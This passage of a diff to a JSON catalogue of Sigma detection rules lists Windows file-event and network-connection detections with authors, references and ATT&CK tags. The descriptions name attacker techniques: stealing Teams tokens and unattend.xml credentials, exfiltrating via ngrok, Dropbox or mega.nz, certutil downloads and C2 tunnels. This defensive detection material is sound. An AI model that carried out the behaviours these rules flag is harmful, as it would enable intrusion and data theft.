"During uninstallation of the IIS service", - "During log rotation" - ], - "filename": "file_delete_win_webserver_access_logs_deleted.yml", - "level": "medium", - "logsource.category": "file_delete", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", - "value": "WebServer Access Logs Deleted" - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "meta": { - "author": "@SerkinValery", - "creation_date": "2022/09/16", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_access_susp_teams.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ] - }, - "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "value": "Suspicious File Event With Teams Objects" - }, - { - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. 
They are used to store credentials/answers during the unattended windows install process\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_access_susp_unattend_xml.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", - "value": "Suspicious Unattend.xml File Access" - }, - { - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "meta": { - "author": "@ROxPinTeddy", - "creation_date": "2020/05/12", - "falsepositive": [ - "Legitimate administrative use" - ], - "filename": "file_event_win_advanced_ip_scanner.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + "https://pypi.org/project/scapy/", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, - "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", - "value": "Advanced IP Scanner - File Event" + "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "value": "Python Initiated Connection" }, { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "description": "Detects suspicious network connection by Notepad", "meta": { - "author": "frack113", - "creation_date": "2022/02/11", - "falsepositive": [ - "Legitimate use" - ], - "filename": "file_event_win_anydesk_artefact.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", - "value": "Anydesk Temporary Artefact" - }, - { - "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/28", + "author": "EagleEye Team", + "creation_date": "2020/05/14", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml", + "filename": "net_connection_win_notepad_network_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", + "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "value": "Notepad Making Network Connection" + }, + { + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/08/17", + "falsepositive": [ + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." 
+ ], + "filename": "net_connection_win_dead_drop_resolvers.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" + ] + }, + "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "value": "Dead Drop Resolvers" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script_wan.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "value": "Script Initiated Connection to Non-Local Network" + }, + { + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_binary_no_cmdline.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": 
"windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "20384606-a124-4fec-acbb-8bd373728613", + "value": "Suspicious Network Connection Binary No CommandLine" + }, + { + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_hh.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", + "value": "HH.EXE Network Connections" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate use of wuauclt.exe over the network." 
+ ], + "filename": "net_connection_win_wuauclt_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "value": "Wuauclt Network Connection" + }, + { + "description": "Detects a rundll32 that communicates with public IP addresses", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/04", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_rundll32_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.execution" + ] + }, + "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "value": "Rundll32 Internet Connection" + }, + { + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/05/15", + "falsepositive": [ + "Other Remote Desktop RDP tools", + "Domain controller using dns.exe" + ], + "filename": "net_connection_win_susp_rdp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "value": "Suspicious Outbound RDP Connections" + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_regsvr32_network_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "value": "Regsvr32 Network Activity" + }, + { + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", + "Network Service user name of a not-covered localization" + ], + "filename": "net_connection_win_remote_powershell_session_network.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "value": "Remote PowerShell Session (Network)" + }, + { + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "value": "Microsoft Sync Center Suspicious Network Connections" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_rdp_to_http.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "value": "RDP to HTTP or HTTPS Target Ports" + }, + { + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "creation_date": "2021/11/10", + "falsepositive": [ + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." 
+ ], + "filename": "net_connection_win_excel_outbound_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://corelight.com/blog/detecting-cve-2021-42292", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", + "value": "Excel Network Connections" + }, + { + "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate certutil network connection" + ], + "filename": "net_connection_win_certutil.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", + "value": "Certutil Initiated Connection" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Other SMTP tools" + ], + "filename": "net_connection_win_susp_outbound_smtp_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "9976fa64-2804-423c-8a5b-646ade840773", + "value": "Suspicious Outbound SMTP Connections" + }, + { + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_binary_susp_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "value": "Microsoft Binary Suspicious Communication Endpoint" + }, + { + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": "net_connection_win_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + 
"https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", + "value": "Communication To Ngrok Tunneling Service" + }, + { + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_malware_backconnect_ports.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "value": "Suspicious Typical Malware Back Connect Ports" + }, + { + "description": "Detects a possible remote connections to Silenttrinity c2", + "meta": { + "author": "Kiran kumar s, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127.001" + ] + }, + "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "value": "Silenttrinity Stager Msbuild Activity" + }, + { + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "meta": { + "author": "frack113, Tim Shelton (fps)", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_epmap.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/TaskShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "value": "Suspicious Epmap Connection" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection. 
Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "value": "Script Initiated Connection" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "value": "Suspicious Outbound Kerberos Connection" + }, + { + "description": "Detects programs with network connections running in suspicious files system locations", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_prog_location_network_connection.yml", + "level": "high", + 
"logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "value": "Suspicious Program Location with Network Connections" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "value": "RDP Over Reverse SSH Tunnel" + }, + { + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/16", + "falsepositive": [ + "Legitimate use of ngrok.io" + ], + "filename": "net_connection_win_ngrok_io.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://ngrok.com/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "18249279-932f-45e2-b37a-8925f2597670", + "value": "Communication To Ngrok.Io" + }, + { + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Legitimate script" + ], + "filename": "net_connection_win_imewdbld.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", + "value": "Download a File with IMEWDBLD.exe" + }, + { + "description": "Detects Dllhost that communicates with public IP addresses", + "meta": { + "author": "bartblaze", + "creation_date": "2020/07/13", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_dllhost_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://redcanary.com/blog/child-processes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution", + "attack.t1559.001" + ] + }, + 
"uuid": "cfed2f44-16df-4bf3-833a-79405198b277", + "value": "Dllhost Internet Connection" + }, + { + "description": "Detects suspicious network connection by Cmstp", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_cmstp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "value": "Cmstp Making Network Connection" + }, + { + "description": "Detects network connections from Equation Editor", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_eqnedt.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://twitter.com/forensicitguy/status/1513538712986079238", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "value": "Equation Editor Network Connection" + }, + { + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/20", + "falsepositive": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "filename": 
"net_connection_win_susp_dropbox_api.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" + ], + "tags": "No established tags" + }, + "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "value": "Suspicious Dropbox API Usage" + }, + { + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Legitimate use of mega.nz uploaders and tools" + ], + "filename": "net_connection_win_mega_nz.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + 